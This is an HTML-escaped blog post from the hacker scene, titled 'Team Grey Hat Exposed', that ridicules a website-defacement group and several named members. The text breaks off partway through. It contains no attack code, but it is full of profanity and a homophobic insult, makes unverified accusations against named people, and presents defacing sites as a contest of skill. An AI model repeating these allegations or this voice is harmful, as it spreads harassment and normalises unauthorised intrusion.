Team</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKIFwDfA5rL9sdjVnkU19EpCjGUNOpdqwpEiX6u1wsJdzODbe6RhUqht4Z2BWpLEJkYhVuJlKkun82u9q1kT5S4tGAJR-83UtNctZc1C2-zh1S7Ny4oRNDcBOnkkbF3OlfIBQPEsbixmVT/s1600/tgh+exposed.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKIFwDfA5rL9sdjVnkU19EpCjGUNOpdqwpEiX6u1wsJdzODbe6RhUqht4Z2BWpLEJkYhVuJlKkun82u9q1kT5S4tGAJR-83UtNctZc1C2-zh1S7Ny4oRNDcBOnkkbF3OlfIBQPEsbixmVT/s320/tgh+exposed.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;u style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;u style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;u style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;u style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;u style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;&quot;&gt;For the Sake of the whole Hacker&#39;s world and cyber world ~ I am publishing this article !&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b style=&quot;color: red;&quot;&gt;Title :&lt;/b&gt; Team Grey Hat Exposed&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;b&gt;What was In?&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;color: black; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;Lamers[TGH]  Exposed !! sO called Lamers group is now Exposed !.. now i will show  you the reality behind the so called Hackers Team Grey (gay:P) Hat . So  what exactly is this team ? nothing but just an IIS Exploit team :P haha  yeah !.. this team is all about IIS Exploit &amp;amp; Story makers :D  (good3y :P) .&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;br /&gt;
so first let me tell you that how united they were fucked :D . i mean  Hacked . Their Forum was hacked by Hunt008 team member of TGH . hahaha  avik sarkar posted a news saying how hunt fooled them :P but my dear  avik hacking is hacking you were social engineered by him ..its also a  part of hacking buddy !&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigO8sxylFshb4ZGJRi6hMsMBkCUfvE67yBHYenWWSbhLrNxGxXJKg5u5nXkhz7UjDEAJwn_xbv-xFur6gC-cJpaz5dfNkYuACDKdnRwd-RWm5CocPdORywcIY_bBVBLsgbmgfPt1jBKoYp/s1600/tgh1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;355&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigO8sxylFshb4ZGJRi6hMsMBkCUfvE67yBHYenWWSbhLrNxGxXJKg5u5nXkhz7UjDEAJwn_xbv-xFur6gC-cJpaz5dfNkYuACDKdnRwd-RWm5CocPdORywcIY_bBVBLsgbmgfPt1jBKoYp/s400/tgh1.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Image 1 ~ TGH Exposed &lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: black;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;Wo0o0o0O0O0opss....Just  read whats written in the image [Image 1] by avik sarkar - &quot; One of the Most  popular Hacker Group &quot; hahahaha avik bro are you sure about this?? fuck  yeah ! &quot;TGH is Regarded as one of the most dangerous Black Hat Team if  we dig in History &quot; No need to dig deep in the History Avik !! Dont  Froget Its a New Team Brother ! .. Just watch the present :D How your  Forum was Fucked easily without any Hardwork&#39; &amp;amp; How your Good3y  Exploit was Exposed :D :* !&lt;/span&gt;&lt;br style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px; text-align: center;&quot; /&gt;&lt;br style=&quot;font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: 18px; text-align: center;&quot; /&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;So  now i would likle to talk about the good3y Exploit which Hacked HCA :D  haha . Formed a new team ? Not getting Traffic ? Not much Popular ? yeah  then got an !dea !! to fool us ? made a Fake Exploit &amp;amp; spreaded it  among the people ? hah atlast you were cought lamers :P A fucking Fake  Exploit caught by a member of HCA :P .&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVAfO4vdt9Dma6HRaATGDoSMrTQqJ6RjBfagGptxYDpqcx0fZmrzZIbpc_IHJJ2dHcCXlixe1HCV4acpWepn1J5a4vGhKIVgcD7h8JRgj9HGRIwd1pFRqbmX_CtjiNaVkTxCtGFRamX2y7/s1600/tgh2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;338&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVAfO4vdt9Dma6HRaATGDoSMrTQqJ6RjBfagGptxYDpqcx0fZmrzZIbpc_IHJJ2dHcCXlixe1HCV4acpWepn1J5a4vGhKIVgcD7h8JRgj9HGRIwd1pFRqbmX_CtjiNaVkTxCtGFRamX2y7/s400/tgh2.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Image 2 ~ TGH Exposed&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;Yeah  so now i would speak about The TGH Lamers2 that is Skywalker :* .  Hhahaha he himself claims to be a Dangerous hacker :p haha but its not  like that . He is just a No0b Hacker who knows &quot;IIS EXPLOIT&quot; . I will  show you some Picz showing the Hacks done By The No0B master Skywalker  !.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6NbN0G7wyC9-cUpj3p-BZomW4vPDYwkBktGyvUYK6r0GXQN2Nf0yYcghcw-hHYyEU-pMkaJlH37oDSVf8tYWLPeFLuvz67_n1MrttSTMRlZtBM-sjOm5zjPTXCtBMNt1GsKY65wVUNVSX/s1600/tgh3.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;351&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6NbN0G7wyC9-cUpj3p-BZomW4vPDYwkBktGyvUYK6r0GXQN2Nf0yYcghcw-hHYyEU-pMkaJlH37oDSVf8tYWLPeFLuvz67_n1MrttSTMRlZtBM-sjOm5zjPTXCtBMNt1GsKY65wVUNVSX/s400/tgh3.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Image 3 ~ TGH Exposed&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUwekFCKCkxgYCjt3BXlAY8BkkfDIm8-WDbZGFK-CfKgB_oaUPJyaOIAsr8B-Y-mh6EvpyjEZocJbQ-rpRuYvpPeAn3_rI4b4xZnfxjNYh58NSikcv_uflg_P0WHVoysm95gYhyphenhyphenqgywgl9/s1600/tgh4.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;351&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUwekFCKCkxgYCjt3BXlAY8BkkfDIm8-WDbZGFK-CfKgB_oaUPJyaOIAsr8B-Y-mh6EvpyjEZocJbQ-rpRuYvpPeAn3_rI4b4xZnfxjNYh58NSikcv_uflg_P0WHVoysm95gYhyphenhyphenqgywgl9/s400/tgh4.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Image 4 ~ TGH Exposed&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white; color: black;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;Team  Grey Hat is just about popularity .. Hhahah see this too :p they hacked  &quot;one&quot; site with IIS Eploit :P &amp;amp; they want this to be posted as news  in many sites .&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv6sze3sQyj8ASOIgdh401I-NPYbKTeUvZN5Njg3NzJgVsZS5XWQwVt3rEY2dhuEY-CpSZN0PXEWWENAeGmcK5nkFb8urKWUvN9Q2QJKyPDifHpboRdoo60CPoq8fFsXswljf53ijXzXaa/s1600/tgh5.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;383&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv6sze3sQyj8ASOIgdh401I-NPYbKTeUvZN5Njg3NzJgVsZS5XWQwVt3rEY2dhuEY-CpSZN0PXEWWENAeGmcK5nkFb8urKWUvN9Q2QJKyPDifHpboRdoo60CPoq8fFsXswljf53ijXzXaa/s400/tgh5.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Image 5 ~ TGH Exposed&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;O0o0o0o00opss....It  seems Skywalker doesn&#39;t know how to Upload his Deface in a Hacked Site  :p Dont worry my dear Skywalker I wil teach you .. Just Contact me -  Yourteam@Exposed :D Hey By the way how you Hacked that site :/ ... ummm  let me tell all that this fucking site is hacked by a fucking perason  with a fucking upload vulnerability :D ... good it reflects your Hacking  Skills :) :P See the Image[Image6] Guys!&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHd47JRnx8D17RciTnfB8vRSs7INRB3e7r4sl8x8ZIjJKkUDvggomjFz-EkC6AyYvxZvcXBfXv3n_2edQ8sPl0yVCX_-A2abdRHj018s4oDm31zHG9lp2WlROIrtsdsh6_ppWRytG3oJj7/s1600/tgh6.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;390&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHd47JRnx8D17RciTnfB8vRSs7INRB3e7r4sl8x8ZIjJKkUDvggomjFz-EkC6AyYvxZvcXBfXv3n_2edQ8sPl0yVCX_-A2abdRHj018s4oDm31zHG9lp2WlROIrtsdsh6_ppWRytG3oJj7/s400/tgh6.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Image 6 ~ TGH Exposed &lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: black;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;Avik  Buddy Very strange You hack websites &amp;amp; post it in your own website  :P ( Apni Tarif Khud hi ?? ) hahah lolx .. See TGH the so called  Dangerous Hacker group :P Hacked 200+ China Sites :o .. Dear Avik even a  small kid can hack 1000+ china sites by that Fucking IIS Exploit :D !!&lt;/span&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&amp;nbsp;. &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5mHLgaFRW7zl5n-ZiXh0WwztsKcHwpA7wHCS3qGFu4kekHSFIY5M3CqF1tblsDe0EXq8KGfFk71U63Z5WuFDuUnCEh_xzYPWoChvn5HsJYTesYgNCdm_Nb28yyPyft0vRUU-UQM8mXs23/s1600/tgh7.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;271&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5mHLgaFRW7zl5n-ZiXh0WwztsKcHwpA7wHCS3qGFu4kekHSFIY5M3CqF1tblsDe0EXq8KGfFk71U63Z5WuFDuUnCEh_xzYPWoChvn5HsJYTesYgNCdm_Nb28yyPyft0vRUU-UQM8mXs23/s400/tgh7.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Image 7 ~ TGH Exposed&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;color: black; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;YEah  Avik sarkar when your Good3y Exploit was caught then everyone was  blaming you :p Then you said to some HCA Members &amp;amp; Other person that  you dont belong to TGH ..according to you VOGH has no relation with TGH  .... haha so wtf is this image[Image 8] saying :/ ... Izzat bachane ke liye  kitna jhute bolega re :P&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggAj1l-_V3TpwhUeaHzyyL0FpGuYklHfT53lp4rPeT-DdetZRmrxxCATVp20ufnRvxkIwVPdwUJ9SC6Aer6_qau8-2r6j6FgD20AeECgiZt-YKcQq6MaqCMqQND_PDzMcRcQbf_GaD4ezR/s1600/tgh8.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;184&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggAj1l-_V3TpwhUeaHzyyL0FpGuYklHfT53lp4rPeT-DdetZRmrxxCATVp20ufnRvxkIwVPdwUJ9SC6Aer6_qau8-2r6j6FgD20AeECgiZt-YKcQq6MaqCMqQND_PDzMcRcQbf_GaD4ezR/s320/tgh8.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Image 8 ~ TGH Exposed&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;color: black; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;There is much to Expose but i dont have much time so i would just expose some of the members of TGH :D&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Rj Raja HaXor&lt;/b&gt;&lt;/u&gt;:- Well i dont think you know him :p he is a member of TGH  With lots of hacking Skills :D i will show you wait just see the Pic[Image 9]  Below .. Even Google says about his Hacking !!! hahah ..&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj26hbBU3-jD-kCYelJr7j5Z76XOUGud7Nf6FXS_L2Msu-TMFZHyakoTUjEhuV1UzHNXx6PLH2HXpgS8myqMjqdwLL-JtEMjgBH_dY1_HBJuzEvOsixzJEPELrqaxuZfg3043SuXD-d661L/s1600/tgh9.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: auto; margin-right: auto;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;104&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj26hbBU3-jD-kCYelJr7j5Z76XOUGud7Nf6FXS_L2Msu-TMFZHyakoTUjEhuV1UzHNXx6PLH2HXpgS8myqMjqdwLL-JtEMjgBH_dY1_HBJuzEvOsixzJEPELrqaxuZfg3043SuXD-d661L/s640/tgh9.jpg&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;tr-caption&quot; style=&quot;text-align: center;&quot;&gt;Image 9 ~ TGH Exposed&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;u&gt;&lt;b&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/u&gt;&lt;span style=&quot;background-color: white; color: black;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;u&gt;&lt;b&gt;Abdullah  Khwaja&lt;/b&gt;&lt;/u&gt;:- He is again a lamer of TGH who loves to Hack sites to IIS  Exploit &amp;amp; Making Cyber army :D yeah !! haha ye is also the Founder  of Kashmir Cyber Army :P haha No0b first learn Hacking Then Make your  Fucking Hacking Cyber Groups :p here are some Beautiful Hacks by him [Image 10] .&lt;/span&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;. &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;color: red; text-align: center;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: #444444;&quot;&gt;&lt;span style=&quot;font-family: Arial,Tahoma,Helvetica,FreeSans,sans-serif; line-height: 18px; text-align: center;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;table align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;tr-caption-container&quot; style=&quot;margin-left: auto; margin-right: auto; text-align: center;&quot;&gt;&lt;tbody&gt;
